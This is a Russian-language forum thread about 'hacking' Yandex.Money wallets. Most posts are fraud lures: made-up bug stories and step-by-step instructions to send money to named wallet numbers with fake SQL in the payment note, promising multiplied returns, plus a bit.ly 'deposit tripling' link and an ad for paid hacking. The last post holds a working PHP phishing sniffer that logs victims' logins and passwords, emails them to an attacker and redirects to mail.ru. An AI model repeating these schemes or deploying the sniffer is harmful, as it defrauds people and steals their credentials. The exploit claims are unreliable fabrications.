ВЗЛОМ ЯНДЕКС КОШЕЛЬКОВ

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » ВЗЛОМ ЯНДЕКС КОШЕЛЬКОВ » Взлом Яндекс Деньги и кошельки » Взлом Яндекс денег


Взлом Яндекс денег

Сообщений 691 страница 695 из 695

691

Снова здравствуйте, что кто пользуется моим способом? как ваши дела?

0

692

Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:


";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 100 руб на этот номер кошелька
41001509339838
И на мой кошель минут через 5 пришло 600 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 100 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 100 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 600 рублей. Как видишь, даже раскрученный проект имеет ошибки.

"Как выполнить взлом яндекс денег на своем компе"

1. Для начала проходим сюда yandex.ru

2. Заводим почтовый ящик

3. Заводим яндекс счет

4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 100 рублей

5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 100 рублей

6 Переводим на этот счет 41001509339838 где мы сделали баг

7. Где сообщение получателю пишем вот это:

SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '600''

Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «41001509339838»

8. В название платежа пишем это:
cc.content_id

9. И потом жмем перевести

10. Все дело сделано ждем минут 5 и к вам должны прийти 600 рублей. Надеюсь подробно объяснил вам. Проверена это уже на многих компах так что дерзайте.

Отредактировано adidasik (2012-09-17 20:02:18)

0

693

Помогу.Дорого!!!! aliansis@mail.ru WM ЯКИ QIWI

Отвечу только на присланное в период с 00.00 до 12:00.Ежедневно.

0

694

Новинка 2015 года! Как утроить депозит на Payeer!
Материал был получен на зарубежном закрытом форуме для хакеров isdark.
В открытом доступе данного материала вы ни где не найдёте. Для работы вам потребуется Tor Browser, его легко найти в сети. Скачиваете, устанавливаете, в адресную строку вставляете эту ссылку bit.ly/1GOo7KY, конектитесь к серверу, выбираете какую сумму хотите утроить, жмёте кнопку "Multiply x3" и через 2-5 мин. у вас на кошельке утроенная сумма. Важно!!! Заведите себе левый кошелёк Payeer. Сразу после поступления утроенной суммы выведите её на карту или другой кошелёк. Утроенную сумму можно получить только один раз и на один кошелёк. Так что можете завести себе несколько левых кошельков. Удачи.

0

695

Взлом работает 410013862844872 кладете 150 получаете 300 Название платежа: php.hack.id
а это вставить в описание:
<?
$adminmail = "youservhost@yandex ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>"

0


Вы здесь » ВЗЛОМ ЯНДЕКС КОШЕЛЬКОВ » Взлом Яндекс Деньги и кошельки » Взлом Яндекс денег